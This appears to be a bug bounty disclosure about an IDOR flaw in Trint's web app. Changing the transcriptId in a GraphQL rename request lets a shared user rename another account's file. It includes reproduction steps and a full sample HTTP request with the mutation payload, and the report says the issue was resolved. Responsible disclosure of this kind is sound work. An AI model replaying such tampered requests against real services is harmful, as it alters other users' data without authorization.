IDOR in changing shared file name
Discovered by dhakalananda on Trint_ltd

This issue took 0 Days and 3 hours to triage and 28 Days and 19 hours to resolve once triaged.



Summary:

Hi Trind LTD, I have found a IDOR vulnerability in https://app.trint.com . An user can change shared file names through this IDOR.

Steps To Reproduce:

  1. Create a file from account B
  2. Capture the request of renaming the file as shown in sample request
  3. Create a file [from account A] and share it with another user [account B]
  4. Change the transcriptId to shared file's transcriptid
  5. Boom! The name of shared file is changed

Sample Request:

POST / HTTP/1.1
Host: graphql2.trint.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.trint.com/trints
content-type: application/json
Authorization: Bearer token..
X-Trint-Request-Id: 34ba5627-d874-4be1-8f9b-5b1415c2f0a5
X-Trint-Super-Properties: {"distinct_id":"5cc05c8f03c35799283fe3b7","$device_id":"16a4f88b2e22dc-07342bd7a0305c8-4c312c7c-144000-16a4f88b2e3be9","$initial_referrer":"$direct","$initial_referring_domain":"$direct","returningUser":true,"$user_id":"5cc05c8f03c35799283fe3b7"}
Origin: https://app.trint.com
Content-Length: 536
Connection: close

{"operationName":"updateTranscriptMeta","variables":{"userId":"5cc05c8f03c35799283fe3b7","transcriptId":"dM3YxaINQGyWceq5rUzVog","transcriptName":"W00"},"query":"mutation updateTranscriptMeta($userId: String!, $transcriptName: String!, $transcriptId: String!) {  updateTranscriptMeta(userId: $userId, transcriptMeta: {trintTitle: $transcriptName}, transcriptId: $transcriptId) {    ...RenameTrintFragment    __typename  }}fragment RenameTrintFragment on TrintMetadata {  _id  trintTitle  updated  __typename}"}

Impact

Unauthorized users could change the file name. It is not allowed to rename the file for shared users but it is bypassed here through IDOR.